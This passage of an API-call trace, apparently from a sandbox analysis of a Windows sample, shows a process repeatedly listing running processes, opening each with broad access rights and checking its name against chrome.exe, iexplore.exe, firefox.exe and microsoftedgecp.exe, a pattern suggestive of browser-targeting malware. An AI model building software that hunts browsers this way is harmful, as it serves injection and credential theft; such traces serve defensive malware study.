	[0207.417] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.418] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x31a8
	[0207.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.420] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.421] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.421] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.421] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0207.422] CloseHandle (hObject=0x188) returned 1
	[0207.422] Sleep (dwMilliseconds=0x64) 
	[0207.824] GetCurrentProcessId () returned 0x110
	[0207.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0207.827] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0207.828] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0207.828] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0207.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x31ac
	[0207.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.829] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.830] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.830] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.830] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.830] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0207.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x31b0
	[0207.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.831] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.832] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.832] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.832] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0207.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x31b4
	[0207.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.833] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0207.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.833] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.834] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0207.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.834] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.834] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0207.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x31b8
	[0207.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.835] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.836] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.836] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.836] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.836] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0207.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x31bc
	[0207.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.837] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0207.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.838] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.838] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0207.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.838] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0207.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x31c0
	[0207.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.990] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0207.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.990] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.990] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0207.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.991] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.991] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0207.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x31c4
	[0207.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.992] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0207.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.992] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.992] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0207.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.993] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0207.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x31c8
	[0207.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.994] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0207.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.994] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.994] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0207.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.994] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.995] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x31cc
	[0207.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.996] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.996] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.997] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.997] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.997] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x31d0
	[0207.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.998] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.999] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x31d4
	[0208.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.000] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.001] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.001] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.001] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x31d8
	[0208.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.002] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.003] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.003] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.004] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.004] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x31dc
	[0208.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.005] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.005] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.006] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.006] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.006] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x31e0
	[0208.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.007] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.007] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.008] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.008] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x31e4
	[0208.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.009] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.009] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.010] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.010] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0208.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x31e8
	[0208.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.263] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0208.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.263] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.263] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0208.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.264] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.264] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x31ec
	[0208.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.265] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.265] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.265] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.266] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.266] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0208.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x31f0
	[0208.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.267] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.267] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.267] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.268] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.268] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0208.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x31f4
	[0208.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0208.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0208.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.270] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.270] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x31f8
	[0208.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.271] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.271] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.271] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.272] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0208.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x31fc
	[0208.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.273] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0208.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.273] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.273] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0208.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.274] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0208.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3200
	[0208.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.275] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0208.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.275] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.275] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0208.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.276] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0208.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3204
	[0208.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.306] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0208.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.307] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
